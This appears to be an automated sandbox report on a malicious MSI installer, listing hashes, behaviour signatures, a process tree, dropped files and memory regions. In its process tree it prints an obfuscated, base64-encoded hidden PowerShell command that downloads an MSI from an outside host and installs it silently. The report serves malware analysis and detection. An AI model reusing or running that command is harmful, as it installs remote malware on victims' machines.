Analysis

  • max time kernel
    117s
  • max time network
    140s
  • platform
    windows7_x64
  • resource
    win7-20230831-en
  • resource tags

    arch:x64arch:x86image:win7-20230831-enlocale:en-usos:windows7-x64system
  • submitted
    11/10/2023, 11:16

General

  • Target

    b029b40badab029cbd916ab2e5147e9f01abd147e1bf9e5ed1564ee44a0d087f_JC.msi

  • Size

    3.4MB

  • MD5

    5d9e72d1e3a99bec71fad561fa95037c

  • SHA1

    fbc94c649ba3d8bb6c7e1d98e7fdeea40cd395b2

  • SHA256

    b029b40badab029cbd916ab2e5147e9f01abd147e1bf9e5ed1564ee44a0d087f

  • SHA512

    8d0311d94a0de8646ec2733530a2db7d2c6e2b03f54e54ac0bc84538a636fe8211e6a582530d9ea8cd02ba08e259d778498d6f29e6744ba45f434d2a87874c97

  • SSDEEP

    49152:E6rGohlj9szAlopTyWD57kEv53rw6cvOlM3w99xYF/gr/QaTdxKJWNYCILZ:qoSTyqk7vvO8Q9xU/w/QPOI9

Score
8/10

Malware Config

Signatures

  • Blocklisted process makes network request 7 IoCs
  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 3 IoCs
  • Enumerates connected drives 3 TTPs 46 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Drops file in Windows directory 10 IoCs
  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of WriteProcessMemory 28 IoCs

Processes

  • C:\Windows\system32\msiexec.exe
    msiexec.exe /I C:\Users\Admin\AppData\Local\Temp\b029b40badab029cbd916ab2e5147e9f01abd147e1bf9e5ed1564ee44a0d087f_JC.msi
    1⤵
    • Blocklisted process makes network request
    • Enumerates connected drives
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    PID:2224
  • C:\Windows\system32\msiexec.exe
    C:\Windows\system32\msiexec.exe /V
    1⤵
    • Blocklisted process makes network request
    • Enumerates connected drives
    • Drops file in Windows directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:2800
    • C:\Windows\syswow64\MsiExec.exe
      C:\Windows\syswow64\MsiExec.exe -Embedding DB03E14E99AD9F2400C05FC253B60C8E
      2⤵
      • Loads dropped DLL
      PID:1636
    • C:\Windows\Installer\MSI9519.tmp
      "C:\Windows\Installer\MSI9519.tmp" /DontWait /HideWindow "C:\Users\Admin\AppData\Local\Temp\DllImport.bat"
      2⤵
      • Executes dropped EXE
      PID:2032
  • C:\Windows\system32\cmd.exe
    cmd /c ""C:\Users\Admin\AppData\Local\Temp\DllImport.bat" "
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2432
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -Ex BYpAss -NONI -w hIDdEn -c dEVICECreDENTiALDePloYmeNt ; ieX($(Iex('[sySTEm.teXT.ENCOdIng]'+[cHAr]58+[Char]58+'uTF8.GETstrInG([SYStEm.cONveRt]'+[cHAr]0x3a+[chaR]0X3a+'FRomBASE64sTring('+[ChAr]34+'JHlyZ09mcWwgPSBBRGQtdHlwRSAtTUVtYkVyZGVGaU5JdGlvbiAnW0RsbEltcG9ydCgiVXJsbW9OIiwgQ2hhclNldCA9IENoYXJTZXQuQW5zaSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciBsUyxzdHJpbmcgSlVUeixzdHJpbmcgZ0FSbVFUUHhmLHVpbnQgeixJbnRQdHIgU3RSKTsnIC1OQU1lICJzWVgiIC1uQW1FU1BBY0UgRFhEIC1QYXNzVGhydTsgJHlyZ09mcWw6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHBzOi8vdGh1bWJuYWlsbXliaXMueHl6L3JtL3ZzLzE3L3JlbGVhc2UvMzMxMTAvbmxzZGF0YTA4MTYubXNpIiwiJGVOdjpBTExVU0VSU1BST0ZJTEVcbmxzZGF0YTA4MTYubXNpIiwwLDApO3N0QVJULVNsZWVwKDMpOyYgbXNpZXhlYyAvaSAiJGVOVjpBTExVU0VSU1BST0ZJTEVcbmxzZGF0YTA4MTYubXNpIiAvcW4gL25vcmVzdGFydA=='+[chAr]0x22+'))')))
      2⤵
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:308
      • C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe
        "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\gti_uu_x.cmdline"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1764
        • C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
          C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESD99E.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCD99D.tmp"
          4⤵
            PID:1456
        • C:\Windows\system32\msiexec.exe
          "C:\Windows\system32\msiexec.exe" /i C:\ProgramData\nlsdata0816.msi /qn /norestart
          3⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:2272

    Network

          MITRE ATT&CK Enterprise v15

          Replay Monitor

          Loading Replay Monitor...

          Downloads

          • C:\Config.Msi\f7681e1.rbs

            Filesize

            1KB

            MD5

            6718321f4f8e0472e502dbeaf1d235c1

            SHA1

            1ed1a68096dde5e6fab1330658ce54acb76d0f71

            SHA256

            4eb6ba33dd81a0097242af2352b0bbdc7a7dea815460444009a1e3bbe232f239

            SHA512

            b4e107bd11958a3a15414ce1ac00f133e73a5235d7c378b39c8db9a5e87d389b51fcfa98a8a31539702782f0ecfc9fc560c8a682bc333380bb8f313503fedd1f

          • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

            Filesize

            344B

            MD5

            5487797980dd74e5694fff0dd885fba8

            SHA1

            3152f3870f46ae8cfced3aec2e08f90335696c63

            SHA256

            9d41e32263d609d1f8e19e1f9d88f2247bc0ec2647754514316112e59655837e

            SHA512

            c59643b65504b66513b4ff2c7496afb3d739ac0e5875d824f19dcea20a143ad9bc352f512143d99aa8ea428114f8883dce418abf36f18287b1c70ece33872664

          • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

            Filesize

            344B

            MD5

            f67cd3a3d00859052643b1ed275721c8

            SHA1

            53713955bd23583be7c9e24327f4a9a6c8284313

            SHA256

            bbe6bc2cee64818ec0842b3457838ab6fbdbdf352d7282c6fdd8e4d7f66abf08

            SHA512

            2d13c3e86901966be571ab4906e0a4d58d95775f264f00a0fb982af7fd397d2f51c53907e71f4bed2e825f29d8f4ad458ddf184e7af4f375a10321c4c6cb86b4

          • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

            Filesize

            344B

            MD5

            7c64fec351c70ed1eac7cdb15b13cd85

            SHA1

            e45bda42a7823cc09541821d3cb4218e7970899a

            SHA256

            7bef9dd1e88fab57bdf584061fa879f140769c17c5a566a2d15560e7d5b83495

            SHA512

            fd5876eeac30c04362b523781b8bdcc737fee684c2d272df2da48da8581b797882e1346994dae4480b8bd9283d1167e7afaa2aad3dc31182068c3eb3941c0dd5

          • C:\Users\Admin\AppData\Local\Temp\Cab7FAD.tmp

            Filesize

            61KB

            MD5

            f3441b8572aae8801c04f3060b550443

            SHA1

            4ef0a35436125d6821831ef36c28ffaf196cda15

            SHA256

            6720349e7d82ee0a8e73920d3c2b7cb2912d9fcf2edb6fd98f2f12820158b0bf

            SHA512

            5ba01ba421b50030e380ae6bbcd2f681f2a91947fe7fedb3c8e6b5f24dce9517abf57b1cf26cc6078d4bb53bde6fcfb2561591337c841f8f2cb121a3d71661b9

          • C:\Users\Admin\AppData\Local\Temp\DllImport.bat

            Filesize

            5.0MB

            MD5

            5cae5e0da425c1f0f8e5cb45292b1dee

            SHA1

            79f65e65785f1a8d39b0a63cbbf0f1684b6d9770

            SHA256

            99f9875bd0d5d59071aaae3d7a6e2dbea0c883da0d39988f0081ee47d6fe25b1

            SHA512

            48bc1e9a8171aa81a251f27387f0cffe99bcd9350173b21dd6b287b0e00c2618a6ee632cdebce10313196fe35ebdb6f73f35d9ee3a2a1bb930680b4cb46231c7

          • C:\Users\Admin\AppData\Local\Temp\RESD99E.tmp

            Filesize

            1KB

            MD5

            17e3f9e8bb8ce73165c401ceab7f07a8

            SHA1

            808d63fdb40dff7846326c5b65e52653f0eb95de

            SHA256

            da766ed56909cf87a0e9c288eea4ffab201c307ca9c2f7ba21ee4b9000de2087

            SHA512

            13cdb4c39f3a9552a7a38d28bdc2971c6796a90107f9b965c1d36e091efc870fc20f6c78aeca20eba259e9b888d39267953da41e680d848fe69d140bbe757a64

          • C:\Users\Admin\AppData\Local\Temp\Tar7FEE.tmp

            Filesize

            163KB

            MD5

            9441737383d21192400eca82fda910ec

            SHA1

            725e0d606a4fc9ba44aa8ffde65bed15e65367e4

            SHA256

            bc3a6e84e41faeb57e7c21aa3b60c2a64777107009727c5b7c0ed8fe658909e5

            SHA512

            7608dd653a66cd364392a78d4711b48d1707768d36996e4d38871c6843b5714e1d7da4b4cc6db969e6000cfa182bcb74216ef6823d1063f036fc5c3413fb8dcf

          • C:\Users\Admin\AppData\Local\Temp\gti_uu_x.dll

            Filesize

            3KB

            MD5

            aa44cdd8b43dd4b60ed14ac5becb96b7

            SHA1

            97dabcd9e8ff672f2e036c961671abc06fcdad29

            SHA256

            4fe6fd928303aace065fdc3b260057947524973cc4d9aa5f5774211533bb98d6

            SHA512

            4c7e7c7583542ae353b431aaa9841490c324aaac5782750adf460f3afad5ad1beb62cbb2b26b7ffd94b495de481618e656730b7554fd5d1aaf46299beefa8318

          • C:\Users\Admin\AppData\Local\Temp\gti_uu_x.pdb

            Filesize

            7KB

            MD5

            c470d5d91b3512f4738ed9568560ec88

            SHA1

            bb940ec8fe7c448f1e98a64938d12872402c3085

            SHA256

            51221b84b4653513b3868ce62488c5fcde4b257a97e0e54d047f3ae88039fc30

            SHA512

            c9b51e456eaa8d6976256c601a33bb8edcf6da9a6449eb59e4b5254efdaab7280c276affc0fbdb5d17871f4669b5a1df41d0454e07a1981486af3f55b36aa411

          • C:\Windows\Installer\MSI8441.tmp

            Filesize

            719KB

            MD5

            89f70b588a48793450dd603b6cd4096f

            SHA1

            9b6509c031856c715d62853c4e93efbdf48d5aeb

            SHA256

            066c52ed8ebf63a33ab8290b7c58d0c13f79c14faa8bf12b1b41f643d3ebe281

            SHA512

            fb04c530430eea6149fd7216f64751e641394a66c0cb222f70c29361baa621a78f906e0adff19bd4cbe5de69edcea7e40bff7c2e068fd4dbd057ca6494db861a

          • C:\Windows\Installer\MSI87FA.tmp

            Filesize

            719KB

            MD5

            89f70b588a48793450dd603b6cd4096f

            SHA1

            9b6509c031856c715d62853c4e93efbdf48d5aeb

            SHA256

            066c52ed8ebf63a33ab8290b7c58d0c13f79c14faa8bf12b1b41f643d3ebe281

            SHA512

            fb04c530430eea6149fd7216f64751e641394a66c0cb222f70c29361baa621a78f906e0adff19bd4cbe5de69edcea7e40bff7c2e068fd4dbd057ca6494db861a

          • C:\Windows\Installer\MSI8887.tmp

            Filesize

            719KB

            MD5

            89f70b588a48793450dd603b6cd4096f

            SHA1

            9b6509c031856c715d62853c4e93efbdf48d5aeb

            SHA256

            066c52ed8ebf63a33ab8290b7c58d0c13f79c14faa8bf12b1b41f643d3ebe281

            SHA512

            fb04c530430eea6149fd7216f64751e641394a66c0cb222f70c29361baa621a78f906e0adff19bd4cbe5de69edcea7e40bff7c2e068fd4dbd057ca6494db861a

          • C:\Windows\Installer\MSI8887.tmp

            Filesize

            719KB

            MD5

            89f70b588a48793450dd603b6cd4096f

            SHA1

            9b6509c031856c715d62853c4e93efbdf48d5aeb

            SHA256

            066c52ed8ebf63a33ab8290b7c58d0c13f79c14faa8bf12b1b41f643d3ebe281

            SHA512

            fb04c530430eea6149fd7216f64751e641394a66c0cb222f70c29361baa621a78f906e0adff19bd4cbe5de69edcea7e40bff7c2e068fd4dbd057ca6494db861a

          • C:\Windows\Installer\MSI9519.tmp

            Filesize

            404KB

            MD5

            f3b3db27ab667f5ed37d1523424b06ac

            SHA1

            cdfa19dabc97005a3d5b3ac4dec171d0b3f2755d

            SHA256

            656c1f34c279d45fde64a8a71eeb8d17c7679543d61c05399826cc903d5ec397

            SHA512

            aa9cd94dde04b7b0235dc0aa06e3e74369ba1017ac4a6fcc3f4422619c10539b72f22a70341ef62a83af0d0fa1461c86343dd7e05cd238e658f73efea6c9d091

          • \??\c:\Users\Admin\AppData\Local\Temp\CSCD99D.tmp

            Filesize

            652B

            MD5

            0adb8a8cec865a947499622cb561fb6a

            SHA1

            4cdad15d56a0f43bc57181c6cef2b7c0b23d4340

            SHA256

            19e7433d931b8cf2cb71e9386313d8022bcce8c93ae2754ff93190dd22435c23

            SHA512

            98c52f5d084fe8f4bbec245132db03add48f3cef186733bf186874097f5cf25a15ba6ab581d64c02c812425e4b207378a931dda4805e018c00eeb539e15e5fcd

          • \??\c:\Users\Admin\AppData\Local\Temp\gti_uu_x.0.cs

            Filesize

            263B

            MD5

            bce29643104bb7fb77da7fcba72bd023

            SHA1

            44e512805c61bc7609f2a3fbbf25c3e5f050e448

            SHA256

            7a015f61be43eecda5b94569061c3745f2e98b2c6ab8322954fef37047cf0e60

            SHA512

            49eafe02b78be36036bedc28fba6265094d4368f8258f2d309a9a1d2b468dda69efaea149fa13bc51079c2f0a4dea55ce9221e5d10c186453ff9ef021ebf5fb8

          • \??\c:\Users\Admin\AppData\Local\Temp\gti_uu_x.cmdline

            Filesize

            309B

            MD5

            3eaf73da47b6c3ac270875416ba8e2dd

            SHA1

            034e434b9e6a9d529393e7d90cd61aef8d579889

            SHA256

            0f1cbf4752c5e8e352ba9d8e34dea3c8ce92325f36750970e1e1ff7effc2e5c5

            SHA512

            cc92a7173f44ffb9e5ad0f6f27cc3e72c0d69e57df186b293b0b713aeba1f0bad62a15cf9195c0a54854db3cbfcdaf50fdf54bf2c1c924ce50a02bd8a7985f54

          • \Windows\Installer\MSI8441.tmp

            Filesize

            719KB

            MD5

            89f70b588a48793450dd603b6cd4096f

            SHA1

            9b6509c031856c715d62853c4e93efbdf48d5aeb

            SHA256

            066c52ed8ebf63a33ab8290b7c58d0c13f79c14faa8bf12b1b41f643d3ebe281

            SHA512

            fb04c530430eea6149fd7216f64751e641394a66c0cb222f70c29361baa621a78f906e0adff19bd4cbe5de69edcea7e40bff7c2e068fd4dbd057ca6494db861a

          • \Windows\Installer\MSI87FA.tmp

            Filesize

            719KB

            MD5

            89f70b588a48793450dd603b6cd4096f

            SHA1

            9b6509c031856c715d62853c4e93efbdf48d5aeb

            SHA256

            066c52ed8ebf63a33ab8290b7c58d0c13f79c14faa8bf12b1b41f643d3ebe281

            SHA512

            fb04c530430eea6149fd7216f64751e641394a66c0cb222f70c29361baa621a78f906e0adff19bd4cbe5de69edcea7e40bff7c2e068fd4dbd057ca6494db861a

          • \Windows\Installer\MSI8887.tmp

            Filesize

            719KB

            MD5

            89f70b588a48793450dd603b6cd4096f

            SHA1

            9b6509c031856c715d62853c4e93efbdf48d5aeb

            SHA256

            066c52ed8ebf63a33ab8290b7c58d0c13f79c14faa8bf12b1b41f643d3ebe281

            SHA512

            fb04c530430eea6149fd7216f64751e641394a66c0cb222f70c29361baa621a78f906e0adff19bd4cbe5de69edcea7e40bff7c2e068fd4dbd057ca6494db861a

          • memory/308-91-0x000007FEF55A0000-0x000007FEF5F3D000-memory.dmp

            Filesize

            9.6MB

          • memory/308-117-0x000007FEF55A0000-0x000007FEF5F3D000-memory.dmp

            Filesize

            9.6MB

          • memory/308-96-0x0000000002610000-0x0000000002618000-memory.dmp

            Filesize

            32KB

          • memory/308-104-0x000007FEF55A0000-0x000007FEF5F3D000-memory.dmp

            Filesize

            9.6MB

          • memory/308-200-0x000007FEF55A0000-0x000007FEF5F3D000-memory.dmp

            Filesize

            9.6MB

          • memory/308-95-0x00000000028D0000-0x0000000002950000-memory.dmp

            Filesize

            512KB

          • memory/308-94-0x000000001B0F0000-0x000000001B3D2000-memory.dmp

            Filesize

            2.9MB

          • memory/308-93-0x00000000028D0000-0x0000000002950000-memory.dmp

            Filesize

            512KB

          • memory/308-97-0x00000000028D0000-0x0000000002950000-memory.dmp

            Filesize

            512KB

          • memory/308-92-0x000007FEF55A0000-0x000007FEF5F3D000-memory.dmp

            Filesize

            9.6MB

          • memory/308-114-0x000000001B610000-0x000000001B618000-memory.dmp

            Filesize

            32KB

          • memory/308-118-0x00000000028D0000-0x0000000002950000-memory.dmp

            Filesize

            512KB

          • memory/308-98-0x00000000028D0000-0x0000000002950000-memory.dmp

            Filesize

            512KB

          • memory/308-147-0x00000000028D0000-0x0000000002950000-memory.dmp

            Filesize

            512KB

          • memory/308-148-0x00000000028D0000-0x0000000002950000-memory.dmp

            Filesize

            512KB

          • memory/308-199-0x00000000028D0000-0x0000000002950000-memory.dmp

            Filesize

            512KB

          • memory/1764-105-0x0000000002260000-0x00000000022E0000-memory.dmp

            Filesize

            512KB

          • memory/2032-82-0x0000000000200000-0x0000000000202000-memory.dmp

            Filesize

            8KB